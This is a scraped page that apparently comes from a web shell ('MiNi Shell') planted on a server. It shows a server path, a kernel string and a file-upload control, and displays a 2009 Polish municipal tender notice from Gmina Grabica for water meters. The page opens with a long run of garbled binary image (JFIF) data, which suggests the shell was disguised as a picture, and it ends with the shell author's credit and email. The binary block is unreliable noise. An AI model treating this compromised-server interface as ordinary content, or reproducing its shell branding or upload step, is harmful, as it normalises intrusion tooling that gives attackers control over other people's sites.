JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090416/107782-N-2009.html

<p class="kh_header"><b>Grabica: SUKCESYWNA DOSTAWA WODOMIERZY ZE ŚRUBUNKAMI I USZCZELKAMI DLA GMINY GRABICA, POWIAT PIOTRKOWSKI, WOJ. ŁÓDZKIE</b><br>
<b>Numer ogłoszenia: 107782 - 2009; data zamieszczenia: 16.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Grabica , Grabica 66, 97-306 Grabica, woj. łódzkie, tel. 044 6161188, faks 044 6161188.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.grabica.propl.com, www.gminagrabica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA DOSTAWA WODOMIERZY ZE ŚRUBUNKAMI I USZCZELKAMI DLA GMINY GRABICA, POWIAT PIOTRKOWSKI, WOJ. ŁÓDZKIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: sukcesywna dostawa 1250 szt. kompletów wodomierzy, w tym:
średnica 15 -     50 szt.,
średnica 20 - 1180 szt.,
średnica 25 -     10 szt.,
średnica 32 -     10 szt. 
Na komplet wodomierza składają się wodomierz z dwoma śrubunkami i dwoma uszczelkami. 

2. Wodomierze muszą spełniać n/w parametry:
- służyć do pomiaru wody pitnej (zimnej) - temp. pracy 0-30°C;
- posiadać próg rozruchu:
dla średnicy 15 -2,0 l/h,
dla średnicy 20 -2,0 l/h,
dla średnicy 25 -3,0 l/h,
dla średnicy 32 -5,0 l/h;
- posiadać klasę C w każdej pozycji montażu;
- posiadać liczydło odporne na zaparowanie;
- posiadać liczydło sumujące pomiar przepływu w postaci cyfrowej;
- posiadać cechy legalizacyjne innego rodzaju niż plomby ołowiane;
- posiadać aktualną cechę legalizacyjną (legalizacja spełniająca wymagania Unii Europejskiej);
- być zabezpieczone przed działaniem pola magnetycznego;
- być zabezpieczone przed ściskaniem;
- być przystosowane do możliwości zamontowania nakładek do odczytu radiowego;
- być przystosowane do montażu bez konieczności montowania odcinków prostych przed i za wodomierzem;
- posiadać ciśnienie robocze max. 1,6 Mpa;
- wodomierze winny posiadać atest higieniczny PZH oraz decyzję zatwierdzenia typu;
- wodomierze o średnicy 15 muszą posiadać długość 110 mm;
- wodomierze o średnicy 20 muszą posiadać długość 110 mm lub 130 mm.
3. Warunki zamówienia:
a) Dostawa przedmiotu zamówienia realizowana będzie sukcesywnie od daty podpisania umowy do 31.10.2009 r. partiami według ustalonego harmonogramu opisanego w pkt. IV SIWZ.
b) Dostawy podzielone zostaną na 6 partii realizowanych w miesięcznych odstępach czasu, z czego pierwsza partia ma być dostarczona do dnia 31.05.2009r., zgodnie z harmonogramem opisanym w pkt. IV SIWZ.
c) Zamawiający zastrzega sobie prawo do dokonania zmian ilości i rodzaju asortymentu w poszczególnych partiach. O dokonaniu takiej zmiany zawiadomi Wykonawcę pisemnie.
d) Zamawiający zastrzega sobie możliwość ograniczenia ilości dostarczanych kompletów wodomierzy w sytuacji, gdy określona w SIWZ ilość przekroczy faktyczne zapotrzebowanie Zamawiającego. 
e) Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze 
z tytułu sprzedaży mniejszej ilości przedmiotu umowy, niż określonej w § 2 ust. 1 umowy (Wzór Nr 5 - SIWZ).
f) Przy dostawie danej partii kompletów wodomierzy Wykonawca przedstawi potwierdzone za zgodność z oryginałem kserokopie następujących dokumentów: 
- Atest higieniczny PZH;
- Decyzję zatwierdzenia typu;
g)Dostawy kompletów wodomierzy będą odbywać się na koszt Wykonawcy.
4. Wykonawca dostawy:
a) udzieli na dostarczone komplety wodomierzy 24-miesięcznej gwarancji jakości i 24 - miesięcznej rękojmi za wady fizyczne;
b) zobowiązuje się dostarczyć przedmiot zamówienia w 6 partiach określonych przez Zamawiającego na własny koszt do Urzędu Gminy w Grabicy;
c) pokryje koszt ubezpieczenia zamówienia do momentu jego odbioru przez Zamawiającego;
d) gwarantuje odpowiednią jakość przedmiotu zamówienia, wg obowiązujących norm;
e) umożliwi regulowanie należności w formie bezgotówkowej, w ciągu 14 dni od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 38.42.11.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE WYMAGANE<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają niżej wymienione warunki określone w art. 22 ust. 1 ustawy Pzp, tzn.:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z przyczyn określonych w art. 24 ust. 1 i 2 ustawy Pzp, tj.:
a) spełniają wszystkie warunki udziału w postępowaniu i nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego zgodnie z art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych.
2. Opis sposobu oceny warunków: 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty, a opisane przez Zamawiającego w pkt.V i VI SIWZ. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.
3. DOTYCZY WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA (SPÓŁKA CYWILNA, KONSORCJUM):
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:
- warunki opisane w pkt V.1) i 4) SIWZ spełniają każdy z osobna;
- warunki opisane w pkt V.2) i 3) SIWZ spełniają łącznie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych, należy złożyć następujące dokumenty:   
1) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (wzór nr 2). 
W przypadku podmiotów występujących wspólnie na oświadczeniu musi złożyć podpis każdy z nich;
2) oświadczenie o nie podleganiu wykluczeniu z postępowania (wzór nr 3). W przypadku podmiotów występujących wspólnie oświadczenie składa każdy z nich;
3) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (zaświadczenia o wpisie do ewidencji działalności gospodarczej - wystawione wcześniej powinny posiadać adnotację organu wystawiającego - dokonaną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - potwierdzającą aktualność zawartych w nim danych - np. AKTUALNE NA DZIEŃ .... lub tożsame...). W przypadku podmiotów występujących wspólnie odpis/zaświadczenie składa każdy z nich;
4) oświadczenie o braku zaległości podatkowych wobec Urzędu Skarbowego, ani z zapłatą należności z tytułu składek na Ubezpieczenia Społeczne (wzór nr 4);  W przypadku podmiotów występujących wspólnie na oświadczeniu musi złożyć podpis każdy z nich; 
2. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, należy złożyć następujące dokumenty:
1) atest higieniczny PZH dopuszczający wyrób do stosowania w kontakcie z wodą pitną, 
2) decyzję zatwierdzenia typu, 
3. Ponadto wykonawca zobowiązany jest przedłożyć w ofercie:
1) wypełniony i podpisany formularz ofertowy (wyłącznie według wzoru Zamawiającego),
2) pełnomocnictwo dla lidera w przypadku podmiotów występujących wspólnie - podpisane przez wszystkich Wykonawców ubiegających się o udzielenie zamówienia,
3) formularz cenowy, 
4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt. 3) SIWZ składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiedziano, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu.
W/w dokumenty, o których mowa w ust. 5 lit. a i b, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 5 lit. c, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę 
lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 pkt. 3) SIWZ zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5. Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
6. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
7. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski sporządzonym przez tłumacza przysięgłego, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.gminagrabica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać bezpłatnie w Urzędzie Gminy Grabica- po złożeniu piesmnego wniosku. Istnieje również możliwość przesłania SIWZ pocztą polską - pokrywając koszt przesyłki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 08:00, miejsce: Urząd Gminy Grabica, 97-306 Grabica - Pokój nr 10, I PIĘTRO (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com